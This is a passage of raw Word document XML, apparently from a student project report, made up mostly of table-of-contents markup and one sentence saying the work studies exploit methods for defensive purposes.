          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The focus here is on understanding these methods to bolster defensive measures and safeguard against potential exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="62"/>
        <w:ind w:left="2261" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9330" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="22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666"/>
        <w:gridCol w:w="6150"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="115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372"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:before="16" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="292" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ch.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-37"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No</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027"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="1946"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:before="16" w:line="242" w:lineRule="auto"/>
              <w:ind w:left="1947" w:right="1866" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Chapter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</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95"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:before="16" w:line="242" w:lineRule="auto"/>
              <w:ind w:left="115" w:firstLine="201"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Page </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="517"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6"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="249"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:before="12" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="6" w:right="169" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.</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211"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:before="12" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="131" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ABSTRACT</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</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2.</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4"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>INTRODUCTION</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</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3.</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3"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="3" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LITERATURE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SURVEY</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="559"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4.</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4"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PROBLEM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-17"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STATEMENT</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</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5.</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able Paragraph"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OBJECTIVES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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="555"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6.</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2"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="2" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>METHODOLOGY</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:right="5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8</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7.</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0"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ALGORITHMS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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="565"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8.</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2"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="2" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HARDWARE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REQUIREMENTS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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="555"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5"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="165" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9.</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4"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SOFTWARE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-18"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REQUIREMENTS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13</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9"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.</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2"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="2" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IMPLEMENTATION</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="555"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9"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11.</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5"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="5" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RESULT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ANALYSIS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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="564"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9"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>12.</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1"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="1" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CONCLUSION</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="574"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9"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>13.</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4"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FUTURE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SCOPE</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29</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9"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:line="320" w:lineRule="exact"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>14.</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3"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:spacing w:line="320" w:lineRule="exact"/>
              <w:ind w:left="3" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REFERENCES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spacing w:line="320" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="560"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49"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="243"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="169" w:right="163" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>15.</w:t>
            </w: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4"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="84"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
              <w:ind w:left="4" w:right="4" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PUBLICATIONS</w:t>
            </w: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28"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
